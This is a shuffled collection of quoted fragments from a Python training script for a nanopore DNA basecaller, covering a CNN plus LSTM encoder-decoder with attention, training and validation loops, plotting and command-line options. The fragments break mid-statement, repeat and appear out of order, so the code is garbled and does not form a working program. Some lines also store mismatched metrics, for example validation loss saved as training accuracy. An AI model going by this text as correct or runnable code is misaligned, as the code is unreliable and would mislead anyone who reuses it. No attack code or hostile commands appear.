"= lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name: if",
"c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x =",
"= True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size,",
"np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed = 0",
"* F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch",
"4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention",
"indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element =",
"batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10",
"data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4]",
"val_losses = [] val_acc = [] val_editd = [] model.eval() total_ed = 0",
"inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x",
"ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates",
"in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\",",
"\" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half",
"provided that the following conditions are met: 1. Redistributions of source code must",
"0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end",
"= F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c)",
"Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args =",
"train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)]",
"pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing if clipping_value !=",
"0 for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out",
"0 loss_iteration = [] acc_iteration = [] editd_iteration = [] for iteration, data",
"dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder",
"and decoder must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder",
"int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len =",
"basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output",
"self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self):",
"\"lstm\" in name and \"linear\" not in name: for b in [\"input\", \"forget\",",
"distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\")",
"lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir,",
"cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation',",
"dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates]",
"ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend()",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance",
"2, i) for epoch in p.keys(): if epoch % print_epoch == 0 or",
"Forward pass through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] #",
"val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1 and a",
"match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target,",
"= [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len)",
"folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int,",
"= { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path",
"== 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\"",
"args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic =",
"'--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n",
"kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn =",
"steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1],",
"# Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim]",
"PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE",
"instances by sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx =",
":] # get only batches that are NOT padded h = hidden[0][:, not_padded_batches,",
"lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens",
"input_decoder[not_padded_batches, :] # get only batches that are NOT padded h = hidden[0][:,",
"= {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder =",
"dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder",
".format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11 start =",
"required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU",
"writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train',",
"next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr,",
"SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND",
"forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0]",
"# [batch size, out dim] return outputs, hidden # Sequence to sequence model",
"dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights",
"# output = (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot",
"filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len),",
"cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu())",
"dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates)",
"[\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head())",
"= 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x,",
"teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer",
"1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] =",
"edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0],",
"args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden =",
"editD=True, reduce_lr=False): #Print all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS",
":]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### #####",
"plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()),",
"= list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len)))",
"#print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x)",
"clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF",
"hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len,",
"+ \"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle)",
"= np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train",
"dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint =",
":] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### #####",
"early_stopping needs the validation loss to check if it has decresed, # and",
"print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30)",
"input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2)",
"list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD:",
"input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256",
"= torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input input_decoder",
"num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim",
"dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients",
"cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p =",
"\"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1],",
"reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates",
"updates from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"= random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest:",
"print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration",
"them in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False),",
"acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings",
"checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2,",
"editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation:",
"color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i",
"edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on",
"notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val =",
"= args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention =",
"labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ###########################################",
"= n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if",
"60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()}",
"AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED",
"= last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches",
"model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in",
"patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr))",
"np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\"",
"where a and b both have shape (num_layers, batch_size, hidden_dim). # Sort instances",
"hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]],",
"input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val",
"v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())],",
"import argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from",
"2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs =",
"= np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len: if",
"> 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch,",
"Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] =",
"np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation",
"nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout',",
"1: not_padded_batches = i < true_y_len # get indices of not padded sequences",
"sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so",
"{} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration",
"labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for",
"layer # shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch,",
"the last element in the batch if i == max_in_batch: break # when",
"batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:,",
"\"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val =",
"WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"import torchvision import pickle import random import time import matplotlib.pyplot as plt import",
"dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val",
"%\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax = fig.add_subplot(1,",
"label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax =",
"length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred",
"optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience",
"help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+',",
"= torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) #",
"# SOS token = 1 [batch size, SOS token] for i in max_for:",
"param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2, n # ordering",
"end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end)",
"updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer,",
"puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update",
"Stop looping if we got to the last element in the batch if",
"-1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates",
"print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration",
"+ 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr:",
"input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda",
"hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim,",
"hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input,",
"= torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for =",
"random_value, mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target",
"plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for",
"requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val =",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\")",
"columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path +",
":] hidden = (h, c) label = y[not_padded_batches, :, i] # batch-i, features,",
"#### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx",
"\", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number",
"hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1,",
"def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1):",
"# batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax(",
"input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len:",
"= 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train =",
"make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to",
"[v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy",
"const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float,",
"Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers,",
"target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\",",
"# if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len)))",
"T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\"",
"train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) #",
"SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start,",
"# ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) #",
"the validation set val_losses = [] val_acc = [] val_editd = [] model.eval()",
"earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value,",
"reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not padded",
"in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0,",
"if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not in name:",
"torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate cross",
"TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE",
"Evaluation on the validation set val_losses = [] val_acc = [] val_editd =",
"i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied",
"x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y,",
"1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val /",
"will make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer,",
"const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network #",
"= bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers,",
"\"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path",
"plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD:",
"std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self,",
"float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val",
"help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000,",
"AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing",
"teacher_forcing_ratio >= 0.25: # if we have reached half of the updates teacher_forcing_ratio",
"# (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return",
"torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len, input_dim]",
"= hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden",
"DAMAGE. \"\"\" import h5py import numpy as np import os import sys import",
"type=int, default=1000, help=\"Make every n updates evaluation on the validation set\") # CNN",
"onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input",
"= torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch,",
"if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not",
"# LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers",
"int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds != None) and (updates",
"plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is not None:",
"label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) #",
"len y = y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs =",
"args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides",
"type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"old_ed = ed2 # epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2)",
"vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100",
"dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad)",
"[\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len)))",
"loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5]",
"input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__()",
"end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0)",
"dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention: # attention self.attn",
"* n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your",
